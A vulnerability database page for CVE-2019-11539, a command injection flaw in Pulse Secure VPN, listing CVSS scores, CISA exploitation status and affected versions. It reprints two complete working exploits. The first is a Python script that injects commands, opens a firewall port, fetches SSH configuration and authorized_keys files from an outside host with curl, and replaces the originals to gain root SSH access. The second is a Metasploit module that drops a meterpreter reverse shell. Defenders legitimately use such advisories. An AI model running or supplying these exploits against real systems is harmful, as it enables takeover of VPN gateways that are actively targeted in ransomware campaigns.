CVE-2019-11539 : Detail

CVE-2019-11539

7.2
/
High
OS Command Injection
A03-Injection
96.44%V3
Network
2019-04-26
01h39 +00:00
2025-02-03
15h41 +00:00
CVE.org
NVD
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

In Pulse Secure Pulse Connect Secure version 9.0RX before 9.0R3.4, 8.3RX before 8.3R7.1, 8.2RX before 8.2R12.1, and 8.1RX before 8.1R15.1 and Pulse Policy Secure version 9.0RX before 9.0R3.2, 5.4RX before 5.4R7.1, 5.3RX before 5.3R12.1, 5.2RX before 5.2R12.1, and 5.1RX before 5.1R15.1, the admin web interface allows an authenticated attacker to inject and execute commands.

CVE Informations

Related Weaknesses

CWE-ID Weakness Name Source
CWE-78 Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
The product constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended OS command when it is sent to a downstream component.

Metrics

Metrics Score Severity CVSS Vector Source
V3.1 7.2 HIGH CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Base: Exploitabilty Metrics

The Exploitability metrics reflect the characteristics of the thing that is vulnerable, which we refer to formally as the vulnerable component.

Attack Vector

This metric reflects the context by which vulnerability exploitation is possible.

Network

The vulnerable component is bound to the network stack and the set of possible attackers extends beyond the other options listed below, up to and including the entire Internet. Such a vulnerability is often termed “remotely exploitable” and can be thought of as an attack being exploitable at the protocol level one or more network hops away (e.g., across one or more routers).

Attack Complexity

This metric describes the conditions beyond the attacker’s control that must exist in order to exploit the vulnerability.

Low

Specialized access conditions or extenuating circumstances do not exist. An attacker can expect repeatable success when attacking the vulnerable component.

Privileges Required

This metric describes the level of privileges an attacker must possess before successfully exploiting the vulnerability.

High

The attacker requires privileges that provide significant (e.g., administrative) control over the vulnerable component allowing access to component-wide settings and files.

User Interaction

This metric captures the requirement for a human user, other than the attacker, to participate in the successful compromise of the vulnerable component.

None

The vulnerable system can be exploited without interaction from any user.

Base: Scope Metrics

The Scope metric captures whether a vulnerability in one vulnerable component impacts resources in components beyond its security scope.

Scope

Formally, a security authority is a mechanism (e.g., an application, an operating system, firmware, a sandbox environment) that defines and enforces access control in terms of how certain subjects/actors (e.g., human users, processes) can access certain restricted objects/resources (e.g., files, CPU, memory) in a controlled manner. All the subjects and objects under the jurisdiction of a single security authority are considered to be under one security scope. If a vulnerability in a vulnerable component can affect a component which is in a different security scope than the vulnerable component, a Scope change occurs. Intuitively, whenever the impact of a vulnerability breaches a security/trust boundary and impacts components outside the security scope in which vulnerable component resides, a Scope change occurs.

Unchanged

An exploited vulnerability can only affect resources managed by the same security authority. In this case, the vulnerable component and the impacted component are either the same, or both are managed by the same security authority.

Base: Impact Metrics

The Impact metrics capture the effects of a successfully exploited vulnerability on the component that suffers the worst outcome that is most directly and predictably associated with the attack. Analysts should constrain impacts to a reasonable, final outcome which they are confident an attacker is able to achieve.

Confidentiality Impact

This metric measures the impact to the confidentiality of the information resources managed by a software component due to a successfully exploited vulnerability.

High

There is a total loss of confidentiality, resulting in all resources within the impacted component being divulged to the attacker. Alternatively, access to only some restricted information is obtained, but the disclosed information presents a direct, serious impact. For example, an attacker steals the administrator's password, or private encryption keys of a web server.

Integrity Impact

This metric measures the impact to integrity of a successfully exploited vulnerability. Integrity refers to the trustworthiness and veracity of information.

High

There is a total loss of integrity, or a complete loss of protection. For example, the attacker is able to modify any/all files protected by the impacted component. Alternatively, only some files can be modified, but malicious modification would present a direct, serious consequence to the impacted component.

Availability Impact

This metric measures the impact to the availability of the impacted component resulting from a successfully exploited vulnerability.

High

There is a total loss of availability, resulting in the attacker being able to fully deny access to resources in the impacted component; this loss is either sustained (while the attacker continues to deliver the attack) or persistent (the condition persists even after the attack has completed). Alternatively, the attacker has the ability to deny some availability, but the loss of availability presents a direct, serious consequence to the impacted component (e.g., the attacker cannot disrupt existing connections, but can prevent new connections; the attacker can repeatedly exploit a vulnerability that, in each instance of a successful attack, leaks a only small amount of memory, but after repeated exploitation causes a service to become completely unavailable).

Temporal Metrics

The Temporal metrics measure the current state of exploit techniques or code availability, the existence of any patches or workarounds, or the confidence in the description of a vulnerability.

Environmental Metrics

These metrics enable the analyst to customize the CVSS score depending on the importance of the affected IT asset to a user’s organization, measured in terms of Confidentiality, Integrity, and Availability.

 [email protected]
V3.0 8 HIGH CVSS:3.0/AC:H/AV:N/A:H/C:H/I:H/PR:H/S:C/UI:N

Base: Exploitabilty Metrics

The Exploitability metrics reflect the characteristics of the thing that is vulnerable, which we refer to formally as the vulnerable component.

Attack Vector

This metric reflects the context by which vulnerability exploitation is possible.

Network

A vulnerability exploitable with network access means the vulnerable component is bound to the network stack and the attacker's path is through OSI layer 3 (the network layer). Such a vulnerability is often termed 'remotely exploitable' and can be thought of as an attack being exploitable one or more network hops away (e.g. across layer 3 boundaries from routers).

Attack Complexity

This metric describes the conditions beyond the attacker's control that must exist in order to exploit the vulnerability.

High

A successful attack depends on conditions beyond the attacker's control. That is, a successful attack cannot be accomplished at will, but requires the attacker to invest in some measurable amount of effort in preparation or execution against the vulnerable component before a successful attack can be expected.

Privileges Required

This metric describes the level of privileges an attacker must possess before successfully exploiting the vulnerability.

High

The attacker is authorized with (i.e. requires) privileges that provide significant (e.g. administrative) control over the vulnerable component that could affect component-wide settings and files.

User Interaction

This metric captures the requirement for a user, other than the attacker, to participate in the successful compromise of the vulnerable component.

None

The vulnerable system can be exploited without interaction from any user.

Base: Scope Metrics

An important property captured by CVSS v3.0 is the ability for a vulnerability in one software component to impact resources beyond its means, or privileges.

Scope

Formally, Scope refers to the collection of privileges defined by a computing authority (e.g. an application, an operating system, or a sandbox environment) when granting access to computing resources (e.g. files, CPU, memory, etc). These privileges are assigned based on some method of identification and authorization. In some cases, the authorization may be simple or loosely controlled based upon predefined rules or standards. For example, in the case of Ethernet traffic sent to a network switch, the switch accepts traffic that arrives on its ports and is an authority that controls the traffic flow to other switch ports.

Changed

An exploited vulnerability can affect resources beyond the authorization privileges intended by the vulnerable component. In this case the vulnerable component and the impacted component are different.

Base: Impact Metrics

The Impact metrics refer to the properties of the impacted component.

Confidentiality Impact

This metric measures the impact to the confidentiality of the information resources managed by a software component due to a successfully exploited vulnerability.

High

There is total loss of confidentiality, resulting in all resources within the impacted component being divulged to the attacker. Alternatively, access to only some restricted information is obtained, but the disclosed information presents a direct, serious impact. For example, an attacker steals the administrator's password, or private encryption keys of a web server.

Integrity Impact

This metric measures the impact to integrity of a successfully exploited vulnerability. Integrity refers to the trustworthiness and veracity of information.

High

There is a total loss of integrity, or a complete loss of protection. For example, the attacker is able to modify any/all files protected by the impacted component. Alternatively, only some files can be modified, but malicious modification would present a direct, serious consequence to the impacted component.

Availability Impact

This metric measures the impact to the availability of the impacted component resulting from a successfully exploited vulnerability.

High

There is total loss of availability, resulting in the attacker being able to fully deny access to resources in the impacted component; this loss is either sustained (while the attacker continues to deliver the attack) or persistent (the condition persists even after the attack has completed). Alternatively, the attacker has the ability to deny some availability, but the loss of availability presents a direct, serious consequence to the impacted component (e.g., the attacker cannot disrupt existing connections, but can prevent new connections; the attacker can repeatedly exploit a vulnerability that, in each instance of a successful attack, leaks a only small amount of memory, but after repeated exploitation causes a service to become completely unavailable).

Temporal Metrics

The Temporal metrics measure the current state of exploit techniques or code availability, the existence of any patches or workarounds, or the confidence that one has in the description of a vulnerability.

Environmental Metrics
V3.0 8 HIGH CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H

Base: Exploitabilty Metrics

The Exploitability metrics reflect the characteristics of the thing that is vulnerable, which we refer to formally as the vulnerable component.

Attack Vector

This metric reflects the context by which vulnerability exploitation is possible.

Network

A vulnerability exploitable with network access means the vulnerable component is bound to the network stack and the attacker's path is through OSI layer 3 (the network layer). Such a vulnerability is often termed 'remotely exploitable' and can be thought of as an attack being exploitable one or more network hops away (e.g. across layer 3 boundaries from routers).

Attack Complexity

This metric describes the conditions beyond the attacker's control that must exist in order to exploit the vulnerability.

High

A successful attack depends on conditions beyond the attacker's control. That is, a successful attack cannot be accomplished at will, but requires the attacker to invest in some measurable amount of effort in preparation or execution against the vulnerable component before a successful attack can be expected.

Privileges Required

This metric describes the level of privileges an attacker must possess before successfully exploiting the vulnerability.

High

The attacker is authorized with (i.e. requires) privileges that provide significant (e.g. administrative) control over the vulnerable component that could affect component-wide settings and files.

User Interaction

This metric captures the requirement for a user, other than the attacker, to participate in the successful compromise of the vulnerable component.

None

The vulnerable system can be exploited without interaction from any user.

Base: Scope Metrics

An important property captured by CVSS v3.0 is the ability for a vulnerability in one software component to impact resources beyond its means, or privileges.

Scope

Formally, Scope refers to the collection of privileges defined by a computing authority (e.g. an application, an operating system, or a sandbox environment) when granting access to computing resources (e.g. files, CPU, memory, etc). These privileges are assigned based on some method of identification and authorization. In some cases, the authorization may be simple or loosely controlled based upon predefined rules or standards. For example, in the case of Ethernet traffic sent to a network switch, the switch accepts traffic that arrives on its ports and is an authority that controls the traffic flow to other switch ports.

Changed

An exploited vulnerability can affect resources beyond the authorization privileges intended by the vulnerable component. In this case the vulnerable component and the impacted component are different.

Base: Impact Metrics

The Impact metrics refer to the properties of the impacted component.

Confidentiality Impact

This metric measures the impact to the confidentiality of the information resources managed by a software component due to a successfully exploited vulnerability.

High

There is total loss of confidentiality, resulting in all resources within the impacted component being divulged to the attacker. Alternatively, access to only some restricted information is obtained, but the disclosed information presents a direct, serious impact. For example, an attacker steals the administrator's password, or private encryption keys of a web server.

Integrity Impact

This metric measures the impact to integrity of a successfully exploited vulnerability. Integrity refers to the trustworthiness and veracity of information.

High

There is a total loss of integrity, or a complete loss of protection. For example, the attacker is able to modify any/all files protected by the impacted component. Alternatively, only some files can be modified, but malicious modification would present a direct, serious consequence to the impacted component.

Availability Impact

This metric measures the impact to the availability of the impacted component resulting from a successfully exploited vulnerability.

High

There is total loss of availability, resulting in the attacker being able to fully deny access to resources in the impacted component; this loss is either sustained (while the attacker continues to deliver the attack) or persistent (the condition persists even after the attack has completed). Alternatively, the attacker has the ability to deny some availability, but the loss of availability presents a direct, serious consequence to the impacted component (e.g., the attacker cannot disrupt existing connections, but can prevent new connections; the attacker can repeatedly exploit a vulnerability that, in each instance of a successful attack, leaks a only small amount of memory, but after repeated exploitation causes a service to become completely unavailable).

Temporal Metrics

The Temporal metrics measure the current state of exploit techniques or code availability, the existence of any patches or workarounds, or the confidence that one has in the description of a vulnerability.

Environmental Metrics

 [email protected]
V2 6.5 AV:N/AC:L/Au:S/C:P/I:P/A:P [email protected]

CISA KEV (Known Exploited Vulnerabilities)

Vulnerability name : Ivanti Pulse Connect Secure and Policy Secure Command Injection Vulnerability

Required action : Apply updates per vendor instructions.

Known To Be Used in Ransomware Campaigns : Known

Added : 2021-11-02 23h00 +00:00

Action is due : 2022-05-02 22h00 +00:00

Important information
This CVE is identified as vulnerable and poses an active threat, according to the Catalog of Known Exploited Vulnerabilities (CISA KEV). The CISA has listed this vulnerability as actively exploited by cybercriminals, emphasizing the importance of taking immediate action to address this flaw. It is imperative to prioritize the update and remediation of this CVE to protect systems against potential cyberattacks.

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
EPSS First.org

Exploit information

Exploit Database EDB-ID : 47354

Publication date : 2019-09-05 22h00 +00:00
Author : Justin Wagner
EDB Verified : No

#!/usr/bin/python # # Exploit Title: Pulse Secure Post-Auth Remote Code Execution # Google Dork: inurl:/dana-na/ filetype:cgi # Date: 09/05/2019 # Exploit Author: Justin Wagner (0xDezzy), Alyssa Herrera (@Alyssa_Herrera_) # Vendor Homepage: https://pulsesecure.net # Version: 8.1R15.1, 8.2 before 8.2R12.1, 8.3 before 8.3R7.1, and 9.0 before 9.0R3.4 # Tested on: linux # CVE : CVE-2019-11539 # # Initial Discovery: Orange Tsai (@orange_8361), Meh Chang (@mehqq_) # # Exploits CVE-2019-11539 to run commands on the Pulse Secure Connect VPN # Downloads Modified SSH configuration and authorized_keys file to allow SSH as root. # You will need your own configuration and authorized_keys files. # # Reference: https://nvd.nist.gov/vuln/detail/CVE-2019-11539 # Reference: https://blog.orange.tw/2019/09/attacking-ssl-vpn-part-3-golden-pulse-secure-rce-chain.html # # Please Note, Alyssa or myself are not responsible with what is done with this code. Please use this at your own discretion and with proper authrization. # We will not bail you out of jail, go to court, etc if you get caught using this maliciously. Be smart and remember, hugs are free. # # Imports import requests import urllib from bs4 import BeautifulSoup # Host information host = '' # Host to exploit login_url = '/dana-na/auth/url_admin/login.cgi' # Login page CMDInjectURL = '/dana-admin/diag/diag.cgi' # Overwrites the Template when using tcpdump CommandExecURL = '/dana-na/auth/setcookie.cgi' # Executes the code # Login Credentials user = 'admin' # Default Username password = 'password' # Default Password # Necessary for Curl downloadHost = '' # IP or FQDN for host running webserver port = '' # Port where web service is running. Needs to be a string, hence the quotes. # Proxy Configuration # Uncomment if you need to use a proxy or for debugging requests proxies = { # 'http': 'http://127.0.0.1:8080', # 'https': 'http://127.0.0.1:8080', } # Headers for requests headers = { 'User-Agent':'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36', 'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-Language':'en-US,en;q=0.5', 'Accept-Encoding':'gzip, deflate', 'Content-Type':'application/x-www-form-urlencoded', } # Cookies to send with request cookies = { 'lastRealm':'Admin%20Users', 'DSSIGNIN':'url_admin', 'DSSignInURL':'/admin/', 'DSPERSISTMSG':'', } # Data for post request loginData = { 'tz_offset': 0, 'username': user, 'password': password, 'realm': 'Admin Users', 'btnSubmit': 'Sign In', } s = requests.Session() # Sets up the session s.proxies = proxies # Sets up the proxies # Disable Warnings from requests library requests.packages.urllib3.disable_warnings() # Administrator Login logic # Probably wouldn't have figured this out without help from @buffaloverflow def adminLogin(): global xsAuth global _headers # Send the intial request r = requests.get('https://%s/dana-na/auth/url_admin/welcome.cgi' % host, cookies=cookies, headers=headers, verify=False, proxies=proxies) print('[#] Logging in...') # Self Explanatory r = s.post('https://' + host + login_url, data=loginData,verify=False, proxies=proxies, allow_redirects=False) # sends login post request print('[#] Sent Login Request...') # Login Logic if r.status_code == 302 and 'welcome.cgi' in r.headers.get("location",""): referer = 'https://%s%s' %(host, r.headers["location"]) # Gets the referer r = s.get(referer, verify=False) # Sends a get request soup = BeautifulSoup(r.text, 'html.parser') # Sets up HTML Parser FormDataStr = soup.find('input', {'id':'DSIDFormDataStr'})["value"] # Gets DSIDFormDataStr print('[#] Grabbing xsauth...') xsAuth = soup.find('input', {'name':'xsauth'})["value"] # Gets the cross site auth token print('[!] Got xsauth: ' + xsAuth) # Self Explanatory data = {'btnContinue':'Continue the session', 'FormDataStr':FormDataStr, 'xsauth':xsAuth} # Submits the continue session page _headers = headers # Sets the headers _headers.update({'referer':referer}) # Updates the headers r = s.post('https://%s' %(host + login_url), data=data, headers=_headers, verify=False, proxies=proxies) #Sends a new post request print('[+] Logged in!') # Self Explanatory # Command injection logic def cmdInject(command): r = s.get('https://' + host + CMDInjectURL, verify=False, proxies=proxies) if r.status_code == 200: soup = BeautifulSoup(r.text, 'html.parser') # Sets up HTML Parser xsAuth = soup.find('input', {'name':'xsauth'})["value"] # Gets the cross site auth token payload = { 'a':'td', 'chkInternal':'On', 'optIFInternal':'int0', 'pmisc':'on', 'filter':'', 'options':'-r$x="%s",system$x# 2>/data/runtime/tmp/tt/setcookie.thtml.ttc <' %command, 'toggle':'Start+Sniffing', 'xsauth':xsAuth } # Takes the generated URL specific to the command then encodes it in hex for the DSLaunchURL cookie DSLaunchURL_cookie = {'DSLaunchURL':(CMDInjectURL+'?a=td&chkInternal=on&optIFInternal=int0&pmisc=on&filter=&options=-r%24x%3D%22'+urllib.quote_plus(command)+'%22%2Csystem%24x%23+2%3E%2Fdata%2Fruntime%2Ftmp%2Ftt%2Fsetcookie.thtml.ttc+%3C&toggle=Start+Sniffing&xsauth='+xsAuth).encode("hex")} # print('[+] Sending Command injection: %s' %command) # Self Explanatory. Useful for seeing what commands are run # Sends the get request to overwrite the template r = s.get('https://' + host + CMDInjectURL+'?a=td&chkInternal=on&optIFInternal=int0&pmisc=on&filter=&options=-r%24x%3D%22'+command+'%22%2Csystem%24x%23+2%3E%2Fdata%2Fruntime%2Ftmp%2Ftt%2Fsetcookie.thtml.ttc+%3C&toggle=Start+Sniffing&xsauth='+xsAuth, cookies=DSLaunchURL_cookie, verify=False, proxies=proxies) # Sends the get request to execute the code r = s.get('https://' + host + CommandExecURL, verify=False) # Main logic if __name__ == '__main__': adminLogin() try: print('[!] Starting Exploit') print('[*] Opening Firewall port...') cmdInject('iptables -A INPUT -p tcp --dport 6667 -j ACCEPT') # Opens SSH port print('[*] Downloading Necessary Files....') cmdInject('/home/bin/curl '+downloadHost+':'+port+'/cloud_sshd_config -o /tmp/cloud_sshd_config') # download cloud_sshd_config cmdInject('/home/bin/curl '+downloadHost+':'+port+'/authorized_keys -o /tmp/authorized_keys') # download authorized_keys print('[*] Backing up Files...') cmdInject('cp /etc/cloud_sshd_config /etc/cloud_sshd_config.bak') # backup cloud_sshd_config cmdInject('cp /.ssh/authorized_keys /.ssh/authorized_keys.bak') # backp authorized_keys print('[*] Overwriting Old Files...') cmdInject('cp /tmp/cloud_sshd_config /etc/cloud_sshd_config') # overwrite cloud_sshd_config cmdInject('cp /tmp/authorized_keys /.ssh/authorized_keys') # overwrite authorized_keys print('[*] Restarting SSHD...') cmdInject('kill -SIGHUP $(pgrep -f "sshd-ive")') # Restart sshd via a SIGHUP print('[!] Done Exploiting the system.') print('[!] Please use the following command:') print('[!] ssh -p6667 root@%s') %(host) except Exception as e: raise
Exploit Database EDB-ID : 47700

Publication date : 2019-11-19 23h00 +00:00
Author : Metasploit
EDB Verified : Yes

## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStager def initialize(info = {}) super(update_info(info, 'Name' => 'Pulse Secure VPN Arbitrary Command Execution', 'Description' => %q{ This module exploits a post-auth command injection in the Pulse Secure VPN server to execute commands as root. The env(1) command is used to bypass application whitelisting and run arbitrary commands. Please see related module auxiliary/gather/pulse_secure_file_disclosure for a pre-auth file read that is able to obtain plaintext and hashed credentials, plus session IDs that may be used with this exploit. A valid administrator session ID is required in lieu of untested SSRF. }, 'Author' => [ 'Orange Tsai', # Discovery (@orange_8361) 'Meh Chang', # Discovery (@mehqq_) 'wvu' # Module ], 'References' => [ ['CVE', '2019-11539'], ['URL', 'https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101/'], ['URL', 'https://blog.orange.tw/2019/09/attacking-ssl-vpn-part-3-golden-pulse-secure-rce-chain.html'], ['URL', 'https://hackerone.com/reports/591295'] ], 'DisclosureDate' => '2019-04-24', # Public disclosure 'License' => MSF_LICENSE, 'Platform' => ['unix', 'linux'], 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64], 'Privileged' => true, 'Targets' => [ ['Unix In-Memory', 'Platform' => 'unix', 'Arch' => ARCH_CMD, 'Type' => :unix_memory, 'Payload' => { 'BadChars' => %Q(&*(){}[]`;|?\n~<>"'), 'Encoder' => 'generic/none' # Force manual badchar analysis }, 'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/generic'} ], ['Linux Dropper', 'Platform' => 'linux', 'Arch' => [ARCH_X86, ARCH_X64], 'Type' => :linux_dropper, 'DefaultOptions' => {'PAYLOAD' => 'linux/x64/meterpreter_reverse_tcp'} ] ], 'DefaultTarget' => 1, 'DefaultOptions' => { 'RPORT' => 443, 'SSL' => true, 'CMDSTAGER::SSL' => true }, 'Notes' => { 'Stability' => [CRASH_SAFE], 'Reliability' => [REPEATABLE_SESSION], 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK], 'RelatedModules' => ['auxiliary/gather/pulse_secure_file_disclosure'] } )) register_options([ OptString.new('SID', [true, 'Valid admin session ID']) ]) end def post_auth? true end def exploit get_csrf_token print_status("Executing #{target.name} target") case target['Type'] when :unix_memory execute_command(payload.encoded) when :linux_dropper execute_cmdstager( flavor: :curl, noconcat: true ) end end def get_csrf_token @cookie = "DSID=#{datastore['SID']}" print_good("Setting session cookie: #{@cookie}") print_status('Obtaining CSRF token') res = send_request_cgi( 'method' => 'GET', 'uri' => diag_cgi, 'cookie' => @cookie ) unless res && res.code == 200 && (@csrf_token = parse_csrf_token(res.body)) fail_with(Failure::NoAccess, 'Session cookie expired or invalid') end print_good("CSRF token: #{@csrf_token}") end def parse_csrf_token(body) body.to_s.scan(/xsauth=([[:xdigit:]]+)/).flatten.first end def execute_command(cmd, _opts = {}) # Prepend absolute path to curl(1), since it's not in $PATH cmd.prepend('/home/bin/') if cmd.start_with?('curl') # Bypass application whitelisting with permitted env(1) cmd.prepend('env ') vprint_status("Executing command: #{cmd}") print_status("Yeeting exploit at #{full_uri(diag_cgi)}") res = send_request_cgi( 'method' => 'GET', 'uri' => diag_cgi, 'cookie' => @cookie, 'vars_get' => { 'a' => 'td', # tcpdump 'options' => sploit(cmd), 'xsauth' => @csrf_token, 'toggle' => 'Start Sniffing' } ) unless res && res.code == 200 fail_with(Failure::UnexpectedReply, 'Could not yeet exploit') end print_status("Triggering payload at #{full_uri(setcookie_cgi)}") res = send_request_cgi({ 'method' => 'GET', 'uri' => setcookie_cgi }, 3.1337) # 200 response code, yet 500 error in body unless res && res.code == 200 && !res.body.include?('500 Internal Error') print_warning('Payload execution may have failed') return end print_good('Payload execution successful') if datastore['PAYLOAD'] == 'cmd/unix/generic' print_line(res.body.sub(/\s*<html>.*/m, '')) end end def sploit(cmd) %(-r$x="#{cmd}",system$x# 2>/data/runtime/tmp/tt/setcookie.thtml.ttc <) end def diag_cgi '/dana-admin/diag/diag.cgi' end def setcookie_cgi '/dana-na/auth/setcookie.cgi' end end

Products Mentioned

Configuraton 0

Ivanti>>Connect_secure >> Version 8.1

Ivanti>>Connect_secure >> Version 8.2

Ivanti>>Connect_secure >> Version 8.3

Pulsesecure>>Pulse_connect_secure >> Version 8.1r1.0

Pulsesecure>>Pulse_connect_secure >> Version 8.2r1.0

Pulsesecure>>Pulse_connect_secure >> Version 8.2r1.1

Pulsesecure>>Pulse_connect_secure >> Version 8.2r2.0

Pulsesecure>>Pulse_connect_secure >> Version 8.2r3.0

Pulsesecure>>Pulse_connect_secure >> Version 8.2r3.1

Pulsesecure>>Pulse_connect_secure >> Version 8.2r4.0

Pulsesecure>>Pulse_connect_secure >> Version 8.2r4.1

Pulsesecure>>Pulse_connect_secure >> Version 8.2r5.0

Pulsesecure>>Pulse_connect_secure >> Version 8.2r5.1

Pulsesecure>>Pulse_connect_secure >> Version 8.2r6.0

Pulsesecure>>Pulse_connect_secure >> Version 8.2r7.0

Pulsesecure>>Pulse_connect_secure >> Version 8.2r7.1

Pulsesecure>>Pulse_connect_secure >> Version 8.2rx

Pulsesecure>>Pulse_connect_secure >> Version 8.3rx

Pulsesecure>>Pulse_connect_secure >> Version 9.0r1

Pulsesecure>>Pulse_connect_secure >> Version 9.0r2

Pulsesecure>>Pulse_connect_secure >> Version 9.0r2.1

Pulsesecure>>Pulse_connect_secure >> Version 9.0r3

Pulsesecure>>Pulse_connect_secure >> Version 9.0r3.1

Pulsesecure>>Pulse_connect_secure >> Version 9.0r3.2

Pulsesecure>>Pulse_connect_secure >> Version 9.0rx

Pulsesecure>>Pulse_policy_secure >> Version 5.1r1.0

Pulsesecure>>Pulse_policy_secure >> Version 5.1r1.1

Pulsesecure>>Pulse_policy_secure >> Version 5.1r2.0

Pulsesecure>>Pulse_policy_secure >> Version 5.1r2.1

Pulsesecure>>Pulse_policy_secure >> Version 5.1r3.0

Pulsesecure>>Pulse_policy_secure >> Version 5.1r3.2

Pulsesecure>>Pulse_policy_secure >> Version 5.1r4.0

Pulsesecure>>Pulse_policy_secure >> Version 5.1r5.0

Pulsesecure>>Pulse_policy_secure >> Version 5.1r6.0

Pulsesecure>>Pulse_policy_secure >> Version 5.1r7.0

Pulsesecure>>Pulse_policy_secure >> Version 5.1r8.0

Pulsesecure>>Pulse_policy_secure >> Version 5.1r9.0

Pulsesecure>>Pulse_policy_secure >> Version 5.1r9.1

Pulsesecure>>Pulse_policy_secure >> Version 5.1r10.0

Pulsesecure>>Pulse_policy_secure >> Version 5.1r11.0

Pulsesecure>>Pulse_policy_secure >> Version 5.1r11.1

Pulsesecure>>Pulse_policy_secure >> Version 5.1r12.0

Pulsesecure>>Pulse_policy_secure >> Version 5.1r12.1

Pulsesecure>>Pulse_policy_secure >> Version 5.1r13.0

Pulsesecure>>Pulse_policy_secure >> Version 5.1r14.0

Pulsesecure>>Pulse_policy_secure >> Version 5.2r1.0

Pulsesecure>>Pulse_policy_secure >> Version 5.2r2.0

Pulsesecure>>Pulse_policy_secure >> Version 5.2r3.0

Pulsesecure>>Pulse_policy_secure >> Version 5.2r3.2

Pulsesecure>>Pulse_policy_secure >> Version 5.2r4.0

Pulsesecure>>Pulse_policy_secure >> Version 5.2r5.0

Pulsesecure>>Pulse_policy_secure >> Version 5.2r6.0

Pulsesecure>>Pulse_policy_secure >> Version 5.2r7.0

Pulsesecure>>Pulse_policy_secure >> Version 5.2r7.1

Pulsesecure>>Pulse_policy_secure >> Version 5.2r8.0

Pulsesecure>>Pulse_policy_secure >> Version 5.2r9.0

Pulsesecure>>Pulse_policy_secure >> Version 5.2r9.1

Pulsesecure>>Pulse_policy_secure >> Version 5.2r10.0

Pulsesecure>>Pulse_policy_secure >> Version 5.2r11.0

Pulsesecure>>Pulse_policy_secure >> Version 5.2rx

Pulsesecure>>Pulse_policy_secure >> Version 5.3r1.0

Pulsesecure>>Pulse_policy_secure >> Version 5.3r1.1

Pulsesecure>>Pulse_policy_secure >> Version 5.3r2.0

Pulsesecure>>Pulse_policy_secure >> Version 5.3r3.0

Pulsesecure>>Pulse_policy_secure >> Version 5.3r3.1

Pulsesecure>>Pulse_policy_secure >> Version 5.3r4.0

Pulsesecure>>Pulse_policy_secure >> Version 5.3r4.1

Pulsesecure>>Pulse_policy_secure >> Version 5.3r5.0

Pulsesecure>>Pulse_policy_secure >> Version 5.3r5.1

Pulsesecure>>Pulse_policy_secure >> Version 5.3r5.2

Pulsesecure>>Pulse_policy_secure >> Version 5.3r6.0

Pulsesecure>>Pulse_policy_secure >> Version 5.3r7.0

Pulsesecure>>Pulse_policy_secure >> Version 5.3r8.0

Pulsesecure>>Pulse_policy_secure >> Version 5.3r8.1

Pulsesecure>>Pulse_policy_secure >> Version 5.3r8.2

Pulsesecure>>Pulse_policy_secure >> Version 5.3r9.0

Pulsesecure>>Pulse_policy_secure >> Version 5.3r10.

Pulsesecure>>Pulse_policy_secure >> Version 5.3r11.0

Pulsesecure>>Pulse_policy_secure >> Version 5.3r12.0

Pulsesecure>>Pulse_policy_secure >> Version 5.3rx

Pulsesecure>>Pulse_policy_secure >> Version 5.4r1

Pulsesecure>>Pulse_policy_secure >> Version 5.4r2

Pulsesecure>>Pulse_policy_secure >> Version 5.4r2.1

Pulsesecure>>Pulse_policy_secure >> Version 5.4r3

Pulsesecure>>Pulse_policy_secure >> Version 5.4r4

Pulsesecure>>Pulse_policy_secure >> Version 5.4r5

Pulsesecure>>Pulse_policy_secure >> Version 5.4r5.2

Pulsesecure>>Pulse_policy_secure >> Version 5.4r6

Pulsesecure>>Pulse_policy_secure >> Version 5.4r6.1

Pulsesecure>>Pulse_policy_secure >> Version 5.4r7

Pulsesecure>>Pulse_policy_secure >> Version 5.4rx

Pulsesecure>>Pulse_policy_secure >> Version 9.0r1

Pulsesecure>>Pulse_policy_secure >> Version 9.0r2

Pulsesecure>>Pulse_policy_secure >> Version 9.0r2.1

Pulsesecure>>Pulse_policy_secure >> Version 9.0r3

Pulsesecure>>Pulse_policy_secure >> Version 9.0r3.1

Pulsesecure>>Pulse_policy_secure >> Version 9.0rx

References

http://www.securityfocus.com/bid/108073
Tags : vdb-entry, x_refsource_BID
https://www.kb.cert.org/vuls/id/927237
Tags : third-party-advisory, x_refsource_CERT-VN